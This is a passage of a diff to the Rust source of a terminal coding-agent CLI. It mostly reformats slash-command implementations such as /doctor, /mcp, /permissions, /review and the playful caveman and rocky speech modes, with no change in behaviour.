+        "reload-plugins"
+    }
+    fn description(&self) -> &str {
+        "Reload all plugins without restarting"
+    }
     fn help(&self) -> &str {
         "Usage: /reload-plugins\n\
          Reloads all plugins and shows what changed."
@@ -1805,14 +1905,15 @@ impl SlashCommand for PluginSlashCommandAdapter {
                 } else {
                     format!("{} {}", command, args)
                 };
-                let cmd_result = std::process::Command::new(if cfg!(windows) { "cmd" } else { "sh" })
-                    .args(if cfg!(windows) {
-                        vec!["/C", &full_cmd]
-                    } else {
-                        vec!["-c", &full_cmd]
-                    })
-                    .env("CLAUDE_PLUGIN_ROOT", plugin_root)
-                    .output();
+                let cmd_result =
+                    std::process::Command::new(if cfg!(windows) { "cmd" } else { "sh" })
+                        .args(if cfg!(windows) {
+                            vec!["/C", &full_cmd]
+                        } else {
+                            vec!["-c", &full_cmd]
+                        })
+                        .env("CLAUDE_PLUGIN_ROOT", plugin_root)
+                        .output();
                 match cmd_result {
                     Ok(out) => {
                         let stdout = String::from_utf8_lossy(&out.stdout);
@@ -1834,8 +1935,12 @@ impl SlashCommand for PluginSlashCommandAdapter {
 
 #[async_trait]
 impl SlashCommand for DoctorCommand {
-    fn name(&self) -> &str { "doctor" }
-    fn description(&self) -> &str { "Check system health and diagnose issues" }
+    fn name(&self) -> &str {
+        "doctor"
+    }
+    fn description(&self) -> &str {
+        "Check system health and diagnose issues"
+    }
     fn help(&self) -> &str {
         "Usage: /doctor\n\
          Runs a comprehensive system diagnostics check:\n\
@@ -1906,7 +2011,10 @@ impl SlashCommand for DoctorCommand {
             }
         }
         // Show which model is active
-        lines.push(format!("  • Active model: {}", ctx.config.effective_model()));
+        lines.push(format!(
+            "  • Active model: {}",
+            ctx.config.effective_model()
+        ));
         lines.push(String::new());
 
         // ── Git ─────────────────────────────────────────────────────────────
@@ -1938,7 +2046,9 @@ impl SlashCommand for DoctorCommand {
                     .to_string();
                 lines.push(format!("  ✓ ripgrep: {first}"));
             }
-            _ => lines.push("  ⚠ ripgrep (rg) not found — Grep tool will fall back to built-in".to_string()),
+            _ => lines.push(
+                "  ⚠ ripgrep (rg) not found — Grep tool will fall back to built-in".to_string(),
+            ),
         }
         lines.push(String::new());
 
@@ -2015,10 +2125,10 @@ impl SlashCommand for DoctorCommand {
                         .and_then(|s| serde_json::from_str::<serde_json::Value>(&s).ok())
                     {
                         Some(_) => lines.push(
-                            "  ⚠ settings.json is JSON but has unexpected structure".to_string()
+                            "  ⚠ settings.json is JSON but has unexpected structure".to_string(),
                         ),
                         None => lines.push(
-                            "  ✗ settings.json is invalid JSON — run /config to repair".to_string()
+                            "  ✗ settings.json is invalid JSON — run /config to repair".to_string(),
                         ),
                     }
                 }
@@ -2032,7 +2142,9 @@ impl SlashCommand for DoctorCommand {
         if claude_md.exists() {
             lines.push("  ✓ AGENTS.md present in working directory".to_string());
         } else {
-            lines.push("  • No AGENTS.md in working directory (run /init to create one)".to_string());
+            lines.push(
+                "  • No AGENTS.md in working directory (run /init to create one)".to_string(),
+            );
         }
         lines.push(String::new());
 
@@ -2047,13 +2159,19 @@ impl SlashCommand for DoctorCommand {
             for srv in ctx.config.mcp_servers.iter().take(12) {
                 let status_str = match statuses.get(&srv.name) {
                     Some(claurst_mcp::McpServerStatus::Connected { tool_count }) => {
-                        format!("  ✓ {} — connected ({} tool{})",
-                            srv.name, tool_count, if *tool_count == 1 { "" } else { "s" })
+                        format!(
+                            "  ✓ {} — connected ({} tool{})",
+                            srv.name,
+                            tool_count,
+                            if *tool_count == 1 { "" } else { "s" }
+                        )
                     }
                     Some(claurst_mcp::McpServerStatus::Connecting) => {
                         format!("  ⚠ {} — connecting…", srv.name)
                     }
-                    Some(claurst_mcp::McpServerStatus::Disconnected { last_error: Some(e) }) => {
+                    Some(claurst_mcp::McpServerStatus::Disconnected {
+                        last_error: Some(e),
+                    }) => {
                         format!("  ✗ {} — failed: {}", srv.name, e)
                     }
                     Some(claurst_mcp::McpServerStatus::Disconnected { last_error: None }) => {
@@ -2071,7 +2189,9 @@ impl SlashCommand for DoctorCommand {
             }
         } else {
             // No live manager — just show configured names
-            lines.push(format!("  ✓ {mcp_count} MCP server(s) configured (not yet connected):"));
+            lines.push(format!(
+                "  ✓ {mcp_count} MCP server(s) configured (not yet connected):"
+            ));
             for srv in ctx.config.mcp_servers.iter().take(8) {
                 lines.push(format!("    - {}", srv.name));
             }
@@ -2087,8 +2207,10 @@ impl SlashCommand for DoctorCommand {
         if hook_count == 0 {
             lines.push("  • No hooks configured".to_string());
         } else {
-            lines.push(format!("  ✓ {hook_count} hook(s) configured across {} event(s)",
-                ctx.config.hooks.len()));
+            lines.push(format!(
+                "  ✓ {hook_count} hook(s) configured across {} event(s)",
+                ctx.config.hooks.len()
+            ));
         }
         lines.push(String::new());
 
@@ -2102,15 +2224,21 @@ impl SlashCommand for DoctorCommand {
         let allowed_count = ctx.config.allowed_tools.len();
         let denied_count = ctx.config.disallowed_tools.len();
         // Tools not in allowed or denied lists require user confirmation
-        let explicit_tools: std::collections::HashSet<&str> = ctx.config.allowed_tools.iter()
+        let explicit_tools: std::collections::HashSet<&str> = ctx
+            .config
+            .allowed_tools
+            .iter()
             .chain(ctx.config.disallowed_tools.iter())
             .map(|s| s.as_str())
             .collect();
-        let confirm_count = all_tool_names.iter()
+        let confirm_count = all_tool_names
+            .iter()
             .filter(|n| !explicit_tools.contains(n.as_str()))
             .count();
         let mode_label = match ctx.config.permission_mode {
-            claurst_core::PermissionMode::BypassPermissions => "bypass-permissions (no confirmation required)",
+            claurst_core::PermissionMode::BypassPermissions => {
+                "bypass-permissions (no confirmation required)"
+            }
             claurst_core::PermissionMode::AcceptEdits => "accept-edits (file edits auto-approved)",
             claurst_core::PermissionMode::Plan => "plan (read-only, no writes)",
             claurst_core::PermissionMode::Default => "default (confirm destructive actions)",
@@ -2118,17 +2246,24 @@ impl SlashCommand for DoctorCommand {
         lines.push(format!("  • Mode: {mode_label}"));
         lines.push(format!("  • Total built-in tools: {total_tools}"));
         if allowed_count > 0 {
-            lines.push(format!("  ✓ Always allowed: {} tool(s) — {}",
+            lines.push(format!(
+                "  ✓ Always allowed: {} tool(s) — {}",
                 allowed_count,
-                ctx.config.allowed_tools.join(", ")));
+                ctx.config.allowed_tools.join(", ")
+            ));
         }
         if denied_count > 0 {
-            lines.push(format!("  ✗ Always denied: {} tool(s) — {}",
+            lines.push(format!(
+                "  ✗ Always denied: {} tool(s) — {}",
                 denied_count,
-                ctx.config.disallowed_tools.join(", ")));
+                ctx.config.disallowed_tools.join(", ")
+            ));
         }
         if ctx.config.permission_mode == claurst_core::PermissionMode::Default {
-            lines.push(format!("  ⚠ Require confirmation: {} tool(s)", confirm_count));
+            lines.push(format!(
+                "  ⚠ Require confirmation: {} tool(s)",
+                confirm_count
+            ));
         }
         lines.push(String::new());
 
@@ -2151,8 +2286,12 @@ impl SlashCommand for DoctorCommand {
 
 #[async_trait]
 impl SlashCommand for LoginCommand {
-    fn name(&self) -> &str { "login" }
-    fn description(&self) -> &str { "Authenticate with Anthropic (OAuth PKCE flow)" }
+    fn name(&self) -> &str {
+        "login"
+    }
+    fn description(&self) -> &str {
+        "Authenticate with Anthropic (OAuth PKCE flow)"
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         // `--console` flag → Console/API-key auth; default → Claude.ai subscription auth
@@ -2165,8 +2304,12 @@ impl SlashCommand for LoginCommand {
 
 #[async_trait]
 impl SlashCommand for LogoutCommand {
-    fn name(&self) -> &str { "logout" }
-    fn description(&self) -> &str { "Clear stored OAuth tokens and API key" }
+    fn name(&self) -> &str {
+        "logout"
+    }
+    fn description(&self) -> &str {
+        "Clear stored OAuth tokens and API key"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         // Clear OAuth tokens file
@@ -2174,7 +2317,9 @@ impl SlashCommand for LogoutCommand {
             return CommandResult::Error(format!("Failed to clear OAuth tokens: {}", e));
         }
         // Also clear any API key stored in settings
-        let mut settings = claurst_core::config::Settings::load().await.unwrap_or_default();
+        let mut settings = claurst_core::config::Settings::load()
+            .await
+            .unwrap_or_default();
         settings.config.api_key = None;
         if let Err(e) = settings.save().await {
             return CommandResult::Error(format!("Failed to update settings: {}", e));
@@ -2188,8 +2333,12 @@ impl SlashCommand for LogoutCommand {
 
 #[async_trait]
 impl SlashCommand for RefreshCommand {
-    fn name(&self) -> &str { "refresh" }
-    fn description(&self) -> &str { "Clear saved provider auth and model caches" }
+    fn name(&self) -> &str {
+        "refresh"
+    }
+    fn description(&self) -> &str {
+        "Clear saved provider auth and model caches"
+    }
     fn help(&self) -> &str {
         "Usage: /refresh\n\n\
          Clears saved provider credentials, provider/model selection, and model caches, then rebuilds the live runtime state.\n\
@@ -2221,8 +2370,12 @@ fn parse_speech_level(args: &str) -> String {
 
 #[async_trait]
 impl SlashCommand for CavemanCommand {
-    fn name(&self) -> &str { "caveman" }
-    fn description(&self) -> &str { "Caveman speech mode — why use many token when few token do trick" }
+    fn name(&self) -> &str {
+        "caveman"
+    }
+    fn description(&self) -> &str {
+        "Caveman speech mode — why use many token when few token do trick"
+    }
     fn help(&self) -> &str {
         "Usage: /caveman [lite|full|ultra]\n\n\
          Activates caveman speech mode that cuts ~75% of output tokens.\n\
@@ -2233,14 +2386,21 @@ impl SlashCommand for CavemanCommand {
     }
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let level = parse_speech_level(args);
-        CommandResult::SpeechMode { mode: Some("caveman".to_string()), level }
+        CommandResult::SpeechMode {
+            mode: Some("caveman".to_string()),
+            level,
+        }
     }
 }
 
 #[async_trait]
 impl SlashCommand for RockyCommand {
-    fn name(&self) -> &str { "rocky" }
-    fn description(&self) -> &str { "Rocky speech mode — Eridian alien engineer from Project Hail Mary. Save big token. Good good good." }
+    fn name(&self) -> &str {
+        "rocky"
+    }
+    fn description(&self) -> &str {
+        "Rocky speech mode — Eridian alien engineer from Project Hail Mary. Save big token. Good good good."
+    }
     fn help(&self) -> &str {
         "Usage: /rocky [lite|full|ultra]\n\n\
          Speak like Rocky from Project Hail Mary. Saves big token. Amaze amaze amaze.\n\
@@ -2251,19 +2411,29 @@ impl SlashCommand for RockyCommand {
     }
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let level = parse_speech_level(args);
-        CommandResult::SpeechMode { mode: Some("rocky".to_string()), level }
+        CommandResult::SpeechMode {
+            mode: Some("rocky".to_string()),
+            level,
+        }
     }
 }
 
 #[async_trait]
 impl SlashCommand for NormalCommand {
-    fn name(&self) -> &str { "normal" }
-    fn description(&self) -> &str { "Deactivate speech mode (caveman/rocky)" }
+    fn name(&self) -> &str {
+        "normal"
+    }
+    fn description(&self) -> &str {
+        "Deactivate speech mode (caveman/rocky)"
+    }
     fn help(&self) -> &str {
         "Usage: /normal\n\nDeactivate any active speech mode and return to normal output."
     }
     async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult {
-        CommandResult::SpeechMode { mode: None, level: "full".to_string() }
+        CommandResult::SpeechMode {
+            mode: None,
+            level: "full".to_string(),
+        }
     }
 }
 
@@ -2271,8 +2441,12 @@ impl SlashCommand for NormalCommand {
 
 #[async_trait]
 impl SlashCommand for InitCommand {
-    fn name(&self) -> &str { "init" }
-    fn description(&self) -> &str { "Initialize a new project with AGENTS.md" }
+    fn name(&self) -> &str {
+        "init"
+    }
+    fn description(&self) -> &str {
+        "Initialize a new project with AGENTS.md"
+    }
 
     async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult {
         let path = ctx.working_dir.join("AGENTS.md");
@@ -2291,10 +2465,7 @@ impl SlashCommand for InitCommand {
             - List important files and their purposes\n";
 
         match tokio::fs::write(&path, default_content).await {
-            Ok(()) => CommandResult::Message(format!(
-                "Created AGENTS.md at {}",
-                path.display()
-            )),
+            Ok(()) => CommandResult::Message(format!("Created AGENTS.md at {}", path.display())),
             Err(e) => CommandResult::Error(format!("Failed to create AGENTS.md: {}", e)),
         }
     }
@@ -2304,8 +2475,12 @@ impl SlashCommand for InitCommand {
 
 #[async_trait]
 impl SlashCommand for ReviewCommand {
-    fn name(&self) -> &str { "review" }
-    fn description(&self) -> &str { "Review code changes via LLM and optionally post to GitHub PR" }
+    fn name(&self) -> &str {
+        "review"
+    }
+    fn description(&self) -> &str {
+        "Review code changes via LLM and optionally post to GitHub PR"
+    }
     fn help(&self) -> &str {
         "Usage: /review [base-ref]\n\n\
          Runs `git diff <base>...HEAD` (or `git diff --cached` when no base is given),\n\
@@ -2349,10 +2524,7 @@ impl SlashCommand for ReviewCommand {
                 }
                 Ok(o) => {
                     let stderr = String::from_utf8_lossy(&o.stderr);
-                    return CommandResult::Error(format!(
-                        "git diff failed: {}",
-                        stderr.trim()
-                    ));
+                    return CommandResult::Error(format!("git diff failed: {}", stderr.trim()));
                 }
                 Err(e) => return CommandResult::Error(format!("Failed to run git: {}", e)),
             }
@@ -2470,9 +2642,7 @@ impl SlashCommand for ReviewCommand {
                 let (msg, _usage, _stop) = acc.finish();
                 let text = msg.get_all_text();
                 if text.is_empty() {
-                    return CommandResult::Error(
-                        "LLM returned an empty review.".to_string(),
-                    );
+                    return CommandResult::Error("LLM returned an empty review.".to_string());
                 }
                 text
             }
@@ -2524,14 +2694,11 @@ impl SlashCommand for ReviewCommand {
                         Ok(resp) => {
                             let status = resp.status().as_u16();
                             let body = resp.text().await.unwrap_or_default();
-                            github_post_result = Some(format!(
-                                "\nGitHub API returned {}: {}",
-                                status, body
-                            ));
+                            github_post_result =
+                                Some(format!("\nGitHub API returned {}: {}", status, body));
                         }
                         Err(e) => {
-                            github_post_result =
-                                Some(format!("\nFailed to post to GitHub: {}", e));
+                            github_post_result = Some(format!("\nFailed to post to GitHub: {}", e));
                         }
                     }
                 } else {
@@ -2643,8 +2810,12 @@ fn parse_github_remote_url(url: &str) -> Option<(String, String)> {
 
 #[async_trait]
 impl SlashCommand for HooksCommand {
-    fn name(&self) -> &str { "hooks" }
-    fn description(&self) -> &str { "Show configured event hooks" }
+    fn name(&self) -> &str {
+        "hooks"
+    }
+    fn description(&self) -> &str {
+        "Show configured event hooks"
+    }
     fn help(&self) -> &str {
         "Usage: /hooks\n\
          Show hooks configured in settings.json under 'hooks'.\n\
@@ -2683,8 +2854,12 @@ impl SlashCommand for HooksCommand {
 
 #[async_trait]
 impl SlashCommand for McpCommand {
-    fn name(&self) -> &str { "mcp" }
-    fn description(&self) -> &str { "Show MCP server status and manage connections" }
+    fn name(&self) -> &str {
+        "mcp"
+    }
+    fn description(&self) -> &str {
+        "Show MCP server status and manage connections"
+    }
     fn help(&self) -> &str {
         "Usage: /mcp [list|status|auth <server>|connect <server>|logs <server>|resources|prompts|get-prompt ...]\n\n\
          Manages Model Context Protocol (MCP) servers.\n\
@@ -2814,7 +2989,7 @@ impl SlashCommand for McpCommand {
                 output.push_str(
                     "\nNote: MCP manager is not active in this session.\n\
                      Restart Claurst to connect to MCP servers.\n\
-                     Use /mcp connect <server> to retry a single server."
+                     Use /mcp connect <server> to retry a single server.",
                 );
             }
             return CommandResult::Message(output);
@@ -2854,7 +3029,7 @@ impl SlashCommand for McpCommand {
         }
         output.push_str(
             "\nSubcommands: status | auth <server> | connect <server> | logs <server>\n\
-             Also: resources | prompts | get-prompt <server> <prompt> [key=val ...]"
+             Also: resources | prompts | get-prompt <server> <prompt> [key=val ...]",
         );
         CommandResult::Message(output)
     }
@@ -2869,15 +3044,29 @@ impl McpCommand {
     ///
     /// For stdio servers: shows env-var auth instructions.
     async fn handle_auth(server_name: &str, ctx: &CommandContext) -> CommandResult {
-        let srv = match ctx.config.mcp_servers.iter().find(|s| s.name == server_name) {
+        let srv = match ctx
+            .config
+            .mcp_servers
+            .iter()
+            .find(|s| s.name == server_name)
+        {
             Some(s) => s,
             None => {
-                let configured: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect();
+                let configured: Vec<&str> = ctx
+                    .config
+                    .mcp_servers
+                    .iter()
+                    .map(|s| s.name.as_str())
+                    .collect();
                 return CommandResult::Error(format!(
                     "No MCP server named '{}' is configured.\n\
                      Configured servers: {}",
                     server_name,
-                    if configured.is_empty() { "(none)".to_string() } else { configured.join(", ") }
+                    if configured.is_empty() {
+                        "(none)".to_string()
+                    } else {
+                        configured.join(", ")
+                    }
                 ));
             }
         };
@@ -2981,22 +3170,31 @@ impl McpCommand {
     fn handle_tools(server_filter: Option<&str>, ctx: &CommandContext) -> CommandResult {
         let manager = match ctx.mcp_manager.as_ref() {
             Some(m) => m,
-            None => return CommandResult::Message(
-                "MCP manager is not active. No tool information available.\n\
-                 Restart Claurst to connect to MCP servers.".to_string()
-            ),
+            None => {
+                return CommandResult::Message(
+                    "MCP manager is not active. No tool information available.\n\
+                 Restart Claurst to connect to MCP servers."
+                        .to_string(),
+                )
+            }
         };
 
         let all_tools = manager.all_tool_definitions();
         let tools: Vec<_> = if let Some(filter) = server_filter {
-            all_tools.iter().filter(|(srv, _)| srv.as_str() == filter).collect()
+            all_tools
+                .iter()
+                .filter(|(srv, _)| srv.as_str() == filter)
+                .collect()
         } else {
             all_tools.iter().collect()
         };
 
         if tools.is_empty() {
             return CommandResult::Message(if let Some(filter) = server_filter {
-                format!("No tools available from server '{}' (not connected or has no tools).", filter)
+                format!(
+                    "No tools available from server '{}' (not connected or has no tools).",
+                    filter
+                )
             } else {
                 "No tools available from any connected MCP server.".to_string()
             });
@@ -3015,9 +3213,16 @@ impl McpCommand {
                 last_server = server.as_str();
             }
             // Strip the "servername_" prefix for display
-            let bare = tool.name.strip_prefix(&format!("{}_", server)).unwrap_or(&tool.name);
+            let bare = tool
+                .name
+                .strip_prefix(&format!("{}_", server))
+                .unwrap_or(&tool.name);
             let preview: String = tool.description.chars().take(80).collect();
-            let ellipsis = if tool.description.len() > 80 { "…" } else { "" };
+            let ellipsis = if tool.description.len() > 80 {
+                "…"
+            } else {
+                ""
+            };
             out.push_str(&format!("  {}\n    {}{}\n", bare, preview, ellipsis));
         }
         CommandResult::Message(out)
@@ -3027,12 +3232,21 @@ impl McpCommand {
     async fn handle_connect(server_name: &str, ctx: &CommandContext) -> CommandResult {
         // Validate that the server is configured.
         if !ctx.config.mcp_servers.iter().any(|s| s.name == server_name) {
-            let names: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect();
+            let names: Vec<&str> = ctx
+                .config
+                .mcp_servers
+                .iter()
+                .map(|s| s.name.as_str())
+                .collect();
             return CommandResult::Error(format!(
                 "No MCP server named '{}' is configured.\n\
                  Configured servers: {}",
                 server_name,
-                if names.is_empty() { "(none)".to_string() } else { names.join(", ") }
+                if names.is_empty() {
+                    "(none)".to_string()
+                } else {
+                    names.join(", ")
+                }
             ));
         }
 
@@ -3052,21 +3266,17 @@ impl McpCommand {
                 let current = manager.server_status(server_name);
                 use claurst_mcp::McpServerStatus;
                 match current {
-                    McpServerStatus::Connected { tool_count } => {
-                        CommandResult::Message(format!(
-                            "MCP server '{}' is already connected ({} tool{} available).",
-                            server_name,
-                            tool_count,
-                            if tool_count == 1 { "" } else { "s" }
-                        ))
-                    }
-                    McpServerStatus::Connecting => {
-                        CommandResult::Message(format!(
-                            "MCP server '{}' is already in the process of connecting.\n\
+                    McpServerStatus::Connected { tool_count } => CommandResult::Message(format!(
+                        "MCP server '{}' is already connected ({} tool{} available).",
+                        server_name,
+                        tool_count,
+                        if tool_count == 1 { "" } else { "s" }
+                    )),
+                    McpServerStatus::Connecting => CommandResult::Message(format!(
+                        "MCP server '{}' is already in the process of connecting.\n\
                              Check back in a moment.",
-                            server_name
-                        ))
-                    }
+                        server_name
+                    )),
                     McpServerStatus::Disconnected { .. } | McpServerStatus::Failed { .. } => {
                         // The McpManager doesn't expose a reconnect method — it's built at
                         // startup.  Inform the user and suggest a restart.
@@ -3093,16 +3303,28 @@ impl McpCommand {
     fn handle_logs(server_name: &str, ctx: &CommandContext) -> CommandResult {
         // Validate server name.
         if !ctx.config.mcp_servers.iter().any(|s| s.name == server_name) {
-            let names: Vec<&str> = ctx.config.mcp_servers.iter().map(|s| s.name.as_str()).collect();
+            let names: Vec<&str> = ctx
+                .config
+                .mcp_servers
+                .iter()
+                .map(|s| s.name.as_str())
+                .collect();
             return CommandResult::Error(format!(
                 "No MCP server named '{}' is configured.\n\
                  Configured servers: {}",
                 server_name,
-                if names.is_empty() { "(none)".to_string() } else { names.join(", ") }
+                if names.is_empty() {
+                    "(none)".to_string()
+                } else {
+                    names.join(", ")
+                }
             ));
         }
 
-        let mut lines = vec![format!("MCP Server Logs — '{}'\n──────────────────────", server_name)];
+        let mut lines = vec![format!(
+            "MCP Server Logs — '{}'\n──────────────────────",
+            server_name
+        )];
 
         if let Some(manager) = &ctx.mcp_manager {
             use claurst_mcp::McpServerStatus;
@@ -3110,30 +3332,52 @@ impl McpCommand {
             lines.push(format!("Current status:  {}", status.display()));
 
             match &status {
-                McpServerStatus::Disconnected { last_error: Some(e) } => {
+                McpServerStatus::Disconnected {
+                    last_error: Some(e),
+                } => {
                     lines.push(format!("\nLast connection error:\n  {}", e));
                     lines.push(String::new());
                     lines.push("Troubleshooting:".to_string());
-                    lines.push(format!("  /mcp auth {}    — check authentication", server_name));
-                    lines.push(format!("  /mcp connect {} — attempt reconnect", server_name));
+                    lines.push(format!(
+                        "  /mcp auth {}    — check authentication",
+                        server_name
+                    ));
+                    lines.push(format!(
+                        "  /mcp connect {} — attempt reconnect",
+                        server_name
+                    ));
                 }
                 McpServerStatus::Failed { error, retry_at } => {
                     lines.push(format!("\nConnection failure:\n  {}", error));
-                    let retry_secs = retry_at.saturating_duration_since(std::time::Instant::now()).as_secs();
+                    let retry_secs = retry_at
+                        .saturating_duration_since(std::time::Instant::now())
+                        .as_secs();
                     if retry_secs > 0 {
                         lines.push(format!("  Automatic retry in {}s", retry_secs));
                     }
                     let _ = retry_at; // used above
                 }
                 McpServerStatus::Connected { tool_count } => {
-                    lines.push(format!("\nServer is healthy — {} tool{} available.", tool_count, if *tool_count == 1 { "" } else { "s" }));
+                    lines.push(format!(
+                        "\nServer is healthy — {} tool{} available.",
+                        tool_count,
+                        if *tool_count == 1 { "" } else { "s" }
+                    ));
                     // Show catalog info if available.
                     if let Some(catalog) = manager.server_catalog(server_name) {
                         if !catalog.resources.is_empty() {
-                            lines.push(format!("Resources ({}): {}", catalog.resource_count, catalog.resources.join(", ")));
+                            lines.push(format!(
+                                "Resources ({}): {}",
+                                catalog.resource_count,
+                                catalog.resources.join(", ")
+                            ));
                         }
                         if !catalog.prompts.is_empty() {
-                            lines.push(format!("Prompts ({}): {}", catalog.prompt_count, catalog.prompts.join(", ")));
+                            lines.push(format!(
+                                "Prompts ({}): {}",
+                                catalog.prompt_count,
+                                catalog.prompts.join(", ")
+                            ));
                         }
                     }
                 }
@@ -3160,9 +3404,12 @@ impl McpCommand {
 
         // Hint about log files.
         lines.push(String::new());
-        lines.push("Note: Detailed stdio output from MCP server processes is not\n\
+        lines.push(
+            "Note: Detailed stdio output from MCP server processes is not\n\
                     captured by the manager. Run the server command directly in a\n\
-                    terminal to see its full output.".to_string());
+                    terminal to see its full output."
+                .to_string(),
+        );
 
         CommandResult::Message(lines.join("\n"))
     }
@@ -3180,7 +3427,8 @@ impl McpCommand {
                 let resources = manager.list_all_resources(filter).await;
                 if resources.is_empty() {
                     return Some(CommandResult::Message(
-                        "No resources available (servers may not support resources/list).".to_string()
+                        "No resources available (servers may not support resources/list)."
+                            .to_string(),
                     ));
                 }
                 let mut out = format!("MCP Resources ({})\n──────────────────\n", resources.len());
@@ -3202,21 +3450,36 @@ impl McpCommand {
                 let prompts = manager.list_all_prompts(filter).await;
                 if prompts.is_empty() {
                     return Some(CommandResult::Message(
-                        "No prompt templates available (servers may not support prompts/list).".to_string()
+                        "No prompt templates available (servers may not support prompts/list)."
+                            .to_string(),
                     ));
                 }
-                let mut out = format!("MCP Prompt Templates ({})\n─────────────────────────\n", prompts.len());
+                let mut out = format!(
+                    "MCP Prompt Templates ({})\n─────────────────────────\n",
+                    prompts.len()
+                );
                 for p in &prompts {
                     let server = p.get("server").and_then(|v| v.as_str()).unwrap_or("?");
                     let name = p.get("name").and_then(|v| v.as_str()).unwrap_or("?");
                     let desc = p.get("description").and_then(|v| v.as_str()).unwrap_or("");
-                    let args: Vec<String> = p.get("arguments")
+                    let args: Vec<String> = p
+                        .get("arguments")
                         .and_then(|a| a.as_array())
-                        .map(|arr| arr.iter()
-                            .filter_map(|a| a.get("name").and_then(|n| n.as_str()).map(|s| s.to_string()))
-                            .collect())
+                        .map(|arr| {
+                            arr.iter()
+                                .filter_map(|a| {
+                                    a.get("name")
+                                        .and_then(|n| n.as_str())
+                                        .map(|s| s.to_string())
+                                })
+                                .collect()
+                        })
                         .unwrap_or_default();
-                    let args_display = if args.is_empty() { String::new() } else { format!(" ({})", args.join(", ")) };
+                    let args_display = if args.is_empty() {
+                        String::new()
+                    } else {
+                        format!(" ({})", args.join(", "))
+                    };
                     if desc.is_empty() {
                         out.push_str(&format!("  [{server}] {name}{args_display}\n"));
                     } else {
@@ -3230,13 +3493,22 @@ impl McpCommand {
                 // /mcp get-prompt <server> <prompt-name> [key=val key2=val2 ...]
                 let server = match parts.get(1) {
                     Some(s) => *s,
-                    None => return Some(CommandResult::Error("Usage: /mcp get-prompt <server> <prompt> [key=value ...]".to_string())),
+                    None => {
+                        return Some(CommandResult::Error(
+                            "Usage: /mcp get-prompt <server> <prompt> [key=value ...]".to_string(),
+                        ))
+                    }
                 };
                 let prompt_name = match parts.get(2) {
                     Some(p) => *p,
-                    None => return Some(CommandResult::Error("Usage: /mcp get-prompt <server> <prompt> [key=value ...]".to_string())),
+                    None => {
+                        return Some(CommandResult::Error(
+                            "Usage: /mcp get-prompt <server> <prompt> [key=value ...]".to_string(),
+                        ))
+                    }
                 };
-                let mut args: std::collections::HashMap<String, String> = std::collections::HashMap::new();
+                let mut args: std::collections::HashMap<String, String> =
+                    std::collections::HashMap::new();
                 if let Some(kv_str) = parts.get(3) {
                     for kv in kv_str.split_whitespace() {
                         if let Some((k, v)) = kv.split_once('=') {
@@ -3251,7 +3523,9 @@ impl McpCommand {
                         for msg in &result.messages {
                             let text = match &msg.content {
                                 claurst_mcp::PromptMessageContent::Text { text } => text.clone(),
-                                claurst_mcp::PromptMessageContent::Image { .. } => "[image]".to_string(),
+                                claurst_mcp::PromptMessageContent::Image { .. } => {
+                                    "[image]".to_string()
+                                }
                                 claurst_mcp::PromptMessageContent::Resource { resource } => {
                                     resource.to_string()
                                 }
@@ -3260,7 +3534,10 @@ impl McpCommand {
                         }
                         Some(CommandResult::UserMessage(injected.trim().to_string()))
                     }
-                    Err(e) => Some(CommandResult::Error(format!("Failed to get prompt '{}' from '{}': {}", prompt_name, server, e))),
+                    Err(e) => Some(CommandResult::Error(format!(
+                        "Failed to get prompt '{}' from '{}': {}",
+                        prompt_name, server, e
+                    ))),
                 }
             }
             _ => None,
@@ -3272,8 +3549,12 @@ impl McpCommand {
 
 #[async_trait]
 impl SlashCommand for PermissionsCommand {
-    fn name(&self) -> &str { "permissions" }
-    fn description(&self) -> &str { "View or change tool permission settings" }
+    fn name(&self) -> &str {
+        "permissions"
+    }
+    fn description(&self) -> &str {
+        "View or change tool permission settings"
+    }
     fn help(&self) -> &str {
         "Usage: /permissions [set <mode>|allow <tool>|deny <tool>|reset]\n\n\
          Modes: default, accept-edits, bypass-permissions, plan\n\n\
@@ -3308,9 +3589,7 @@ impl SlashCommand for PermissionsCommand {
                  Use /permissions set <mode> to change the permission mode.\n\
                  Use /permissions allow|deny <tool> to override individual tools.\n\
                  Use /permissions reset to clear all overrides.",
-                ctx.config.permission_mode,
-                allowed_display,
-                denied_display,
+                ctx.config.permission_mode, allowed_display, denied_display,
             ));
         }
 
@@ -3322,16 +3601,24 @@ impl SlashCommand for PermissionsCommand {
             "set" => {
                 let mode = match arg.to_lowercase().as_str() {
                     "default" => claurst_core::config::PermissionMode::Default,
-                    "accept-edits" | "accept_edits" => claurst_core::config::PermissionMode::AcceptEdits,
-                    "bypass-permissions" | "bypass_permissions" => claurst_core::config::PermissionMode::BypassPermissions,
+                    "accept-edits" | "accept_edits" => {
+                        claurst_core::config::PermissionMode::AcceptEdits
+                    }
+                    "bypass-permissions" | "bypass_permissions" => {
+                        claurst_core::config::PermissionMode::BypassPermissions
+                    }
                     "plan" => claurst_core::config::PermissionMode::Plan,
-                    _ => return CommandResult::Error(
-                        "Mode must be: default, accept-edits, bypass-permissions, or plan".to_string()
-                    ),
+                    _ => {
+                        return CommandResult::Error(
+                            "Mode must be: default, accept-edits, bypass-permissions, or plan"
+                                .to_string(),
+                        )
+                    }
                 };
                 let mut new_config = ctx.config.clone();
                 new_config.permission_mode = mode.clone();
-                if let Err(e) = save_settings_mutation(|s| s.config.permission_mode = mode.clone()) {
+                if let Err(e) = save_settings_mutation(|s| s.config.permission_mode = mode.clone())
+                {
                     return CommandResult::Error(format!("Failed to save: {}", e));
                 }
                 CommandResult::ConfigChangeMessage(
@@ -3408,8 +3695,12 @@ impl SlashCommand for PermissionsCommand {
 
 #[async_trait]
 impl SlashCommand for PlanCommand {
-    fn name(&self) -> &str { "plan" }
-    fn description(&self) -> &str { "Enter plan mode – model outputs a plan for approval before acting" }
+    fn name(&self) -> &str {
+        "plan"
+    }
+    fn description(&self) -> &str {
+        "Enter plan mode – model outputs a plan for approval before acting"
+    }
     fn help(&self) -> &str {
         "Usage: /plan [description]\n\n\
          Switches to plan mode where the model will create a detailed plan before executing.\n\
@@ -3420,7 +3711,7 @@ impl SlashCommand for PlanCommand {
